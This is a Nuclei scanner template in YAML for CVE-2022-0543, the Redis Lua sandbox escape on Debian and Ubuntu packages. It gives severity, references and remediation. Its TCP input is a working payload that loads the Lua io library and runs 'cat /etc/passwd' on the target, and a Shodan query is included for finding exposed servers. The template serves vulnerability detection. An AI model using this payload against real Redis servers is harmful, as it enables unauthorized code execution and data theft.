43 lines
1.8 KiB
YAML
43 lines
1.8 KiB
YAML
id: CVE-2022-0543
|
|
|
|
info:
|
|
name: Redis Sandbox Escape - Remote Code Execution
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: |
|
|
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
|
|
reference:
|
|
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
|
|
- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
|
|
- https://bugs.debian.org/1005787
|
|
- https://www.debian.org/security/2022/dsa-5081
|
|
- https://lists.debian.org/debian-security-announce/2022/msg00048.html
|
|
remediation: Update to the most recent versions currently available.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2022-0543
|
|
cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
|
|
epss-score: 0.97184
|
|
metadata:
|
|
max-request: 1
|
|
product: redis
|
|
shodan-query: redis_version
|
|
vendor: redis
|
|
tags: cve,cve2022,network,redis,unauth,rce,kev
|
|
|
|
tcp:
|
|
- host:
|
|
- "{{Hostname}}"
|
|
- "tls://{{Hostname}}"
|
|
port: 6380
|
|
|
|
inputs:
|
|
- data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
|
|
read-size: 64
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4b0a00483046022100eb974862daaa61272dbf5a282701e7337028b4724c883be8673419b2dcd01b30022100bf7b73e76c9d0e70f83f27318027d477f084528a977168d364890ff6839e3c91:922c64590222798bb761d5b6d8e72950 |